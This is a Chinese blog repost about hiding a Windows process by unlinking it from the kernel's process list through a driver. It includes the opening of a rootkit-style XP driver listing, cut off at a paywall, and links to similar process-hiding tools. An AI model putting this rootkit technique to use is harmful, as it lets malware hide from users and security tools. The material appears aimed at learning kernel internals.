内核学习--驱动隐藏进程

最新推荐文章于 2025-05-26 22:00:00 发布
转载 最新推荐文章于 2025-05-26 22:00:00 发布 · 394 阅读 · 3 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/herso/archive/2009/03/22/1419192.html
文章标签:

#数据结构与算法

本文介绍了通过修改Windows系统内核链表隐藏进程的原理,指出这种方法在现代杀毒软件面前效果有限。由于需要在Ring0层操作,通常应用程序无法实现,必须编写驱动程序。分享了一个不稳定且适用于XP SP3的驱动代码示例,警告可能在其他系统上导致蓝屏。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

实在不好意思拿出手,都是人家玩烂的技术了。。。可我还是要学习。。。也给小白们科普了 

原理:

windows系统内核内部采用链表的方式将进程链起来。如果我们从链表中摘掉想要隐藏的进程,那么一般的采用这种方式遍历进程的工具也就没有用处了。。也就达到我们的目的了。。悲哀的任务管理器。。。具体的就不记录了。。。(但是这种方法对现在的杀毒基本不起什么作用。。除了一些弱智杀毒软件。。。)

对内核数据结构的操作需要工作在Cpu的Ring0层,一般的应用程序也就没什么用武之地了 。。只有采用驱动的方式进行。。。nb的驱动。。邪恶的驱动。。。

下面自己的写的驱动代码。。不是很稳定。。。windows xp sp3下能正常运行,其他的系统没有测试。。估计要蓝屏 因为里面有HardCode。。 蓝屏不要拍我啊 。。。

 

ContractedBlock.gif ExpandedBlockStart.gif Code
  1 
  2 #include "ntddk.h"
  3 #include "stdio.h"
  4 #include "stdlib.h"
  5 typedef BOOLEAN BOOL;
  6 typedef unsigned long DWORD;
  7 typedef DWORD * PDWORD;
  8 
  9 #define FILE_DEVICE_ROOTKIT      0x00002a7b
 10 
 11 #define IOCTL_ROOTKIT_INIT            (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x01, METHOD_BUFFERED, FILE_WRITE_ACCESS)
 12 #define IOCTL_ROOTKIT_HIDEME          (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x02, METHOD_BUFFERED, FILE_WRITE_ACCESS)
 13 int FLINKOFFSET;   
 14 int PIDOFFSET; 
 15 PDEVICE_OBJECT g_RootkitDevice; 
 16 const WCHAR deviceLinkBuffer[]  = L"\\DosDevices\\Fr";
 17 const WCHAR deviceNameBuffer[]  = L"\\Device\\Fr";
 18 
 19 #define   DebugPrint        DbgPrint   
 20 
 21 
 22 NTSTATUS RootkitDispatch(IN PDEVICE_OBJECT, IN PIRP);
 23 
 24 NTSTATUS RootkitHide(IN PDEVICE_OBJECT, IN PIRP);
 25 
 26 NTSTATUS RootkitUnload(IN PDRIVER_OBJECT);
 27 
 28 long    FindEproc( long pID );
 29 
 30 
 31 NTSTATUS DriverEntry(
 32                    IN PDRIVER_OBJECT  DriverObject,
 33                    IN PUNICODE_STRING RegistryPath
 34                     )
 35 {
 36     
 37     NTSTATUS                ntStatus;
 38     UNICODE_STRING          deviceNameUnicodeString;
 39     UNICODE_STRING          deviceLinkUnicodeString;        
 40     RtlInitUnicodeString (&deviceNameUnicodeString,
 41                           deviceNameBuffer );
 42     RtlInitUnicodeString (&deviceLinkUnicodeString,
 43                           deviceLinkBuffer );
 44 
 45     ntStatus = IoCreateDevice ( DriverObject,
 46                                 0// For driver extension
 47                                 &deviceNameUnicodeString,
 48                                 FILE_DEVICE_ROOTKIT,
 49                                 0,
 50                                 TRUE,
 51                     &n
最低0.47元/天 解锁文章

200万优质内容无限畅学
Win64 驱动内核编程-21.DKOM隐藏和保护进程
墨鱼菜鸡
12-18 251
DKOM隐藏和保护进程 主要就是操作链表,以及修改节点内容。 DKOM隐藏进程和保护进程的本质是操作EPROCESS结构体,不同的系统用的时候注意查下相关定义,确定下偏移,下面的数据是以win764为例。 关注两个成员:ActiveProcessLinks和Flag。 Acti...
驱动签名 隐藏进程 保护进程 多种方式 保护进程驱动
05-18
多种方法 保护进程 断链 修改Flag hook对象 抹psp表 csscs表 注册回调 ObRegisterCallbacks
[Windows 驱动开发] 隐藏进程内存
LYSM
09-01 1851
原理 在进程的 _EPROCESS 中有一个 _RTL_AVL_TREE 类型的 VadRoot 成员,它是一个存放进程内存块的二叉树结构,如果我们找到了这个二叉树中我们想要隐藏的内存,直接将这个内存在二叉树中 “抹去”(其实是让上一个节点的 EndingVpn 指向下个节点的 EndingVpn ,让两个节点融合) 就可以达到隐藏的效果。 过程 比如你在代码中申请了两块内存: int main() { LPVOID p1 = VirtualAlloc(NULL, 0x10000, MEM_CO
win10/win11 驱动进程隐藏进程/保护进程/保护窗口/内核反截图
最新发布
OBBPkk的博客
05-26 283
win10/win11 驱动进程隐藏进程/保护进程/保护窗口/内核反截图
驱动隐藏进程
10-17
驱动级,对进程隐藏,需要的朋友,可以下载使用。
驱动层SSDT 隐藏进程
ShadowAssassin的专栏
11-27 6858
闲着没事,便想在熟悉下之前看过的驱动编程相关知识,于是就写了这个简单的驱动隐藏进程程序。 要点:  在驱动隐藏,主要还是使用SSDT挂钩的方法,相关知识,可以到网上查找,在隐藏进程时,为了能够隐藏多个进程,在内核代码中创建一个链表,结构如下: //存放要隐藏进程的名字链表 typedef struct _ProcNameLink { UNICODE_STRING ProcName; s
易语言驱动隐藏进程源码-易语言
06-12
易语言驱动隐藏进程源码
驱动级的隐藏进程代码,在驱动层通过替换ssdt地址表中的函数来隐藏进程...
06-26
在IT安全领域,驱动级的隐藏进程技术是一种高级的系统隐藏策略,主要应用于恶意软件或黑客工具中,目的是避开安全软件的检测。本篇将详细解释这种技术,并着重讨论如何在驱动层通过替换System Service Dispatch ...
驱动隐藏进程和文件
09-21
强大的驱动进程隐藏技术,有应用层的相关调用以及GUI,是学习驱动程序的好资料
驱动隐藏进程(eprocess断链)
qq_43147121的博客
10-01 1369
具体的原理就不详细描述了,这种办法是最为基础的隐藏手段而且网上有很多文章,只不过我看了一些大部分都只是直接在driverEntry中写死的那种,所以我简单写了个三环0环交互的驱动代码供大家参考。进程内核中存在一个双向链表将所有的活动进程串联起来,今天写的就是将我们的目标进程从这个链表中移除以达到隐藏进程的目的。
驱动级别隐藏进程源代码
06-09
之前在csdn下载的代码,修改了其中的两个bug:1、在有些机器上运行时蓝屏。2、存在内核内存的泄露(通常半天时间后就会死机或自动重启)。 这个是没有完全改好的:( 自己不能编辑资源,所以又上传了一个(驱动级别隐藏进程源代码2)
驱动隐藏进程(易语言).e
02-15
驱动隐藏进程
进程隐藏工具--内核驱动实现
12-21
可以实现进程的遍历和隐藏,自己写的,希望大家批评指正,谢谢!
驱动进程保护 隐藏 注入
08-04
驱动进程保护 隐藏 注入 W7 W8 W10 32 64位都支持 不蓝屏
ring0驱动层上实现 隐藏进程(无进程 无端口 无服务)的简单demo.zip
01-24
ring0驱动层上实现 隐藏进程(无进程 无端口 无服务)的简单demo.zip
驱动隐藏进程
kktlxd的专栏
06-01 2958
FU_rootkit中有很多功能,先看了隐藏进程,,和以前在群里讨论的一样,windows调度的是线程,所以可以把要隐藏进程进程链中去掉,并不影响进程中的线程的调度和运行. FU_rootkit中的方法是先通过PsGetCurrentProcess(),(PsGetCurrentProcess returns a pointer to the process of the current
驱动级!进程隐藏-按键精灵过检】驱动级,内核进程隐藏进程保护。实战效果演示,免费分享。
luoqiaoliang的博客
05-20 6855
废话不多说,干货直接上! 免费的驱动进程隐藏工具分享,还不赶紧带上你的赞和关注白嫖一波吗?
[驱动] 隐藏进程 驱动级 摘链 任务管理器看不到
Sprite雪碧
11-27 1814
闲着蛋疼写来玩玩练练手没啥技术含量只是个简单的摘链任务管理器看不到 测试环境 Win7 x86 typedef struct { DWORD_PTR EProcess; UCHAR* ImageName; ULONG ProcessID; }_Process_Info; NTSTATUS HideProcess() { DWORD_PTR CurrentEProcess...
T-ProcMon进程隐藏驱动代码分析实践
在本例中,隐藏进程驱动代码允许系统调用特定的功能来隐藏进程驱动程序通常运行在操作系统的内核模式下,因此它们拥有较高的执行权限和对硬件的直接访问能力。 3. Windows 2000/XP操作系统:这两个版本是微软...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值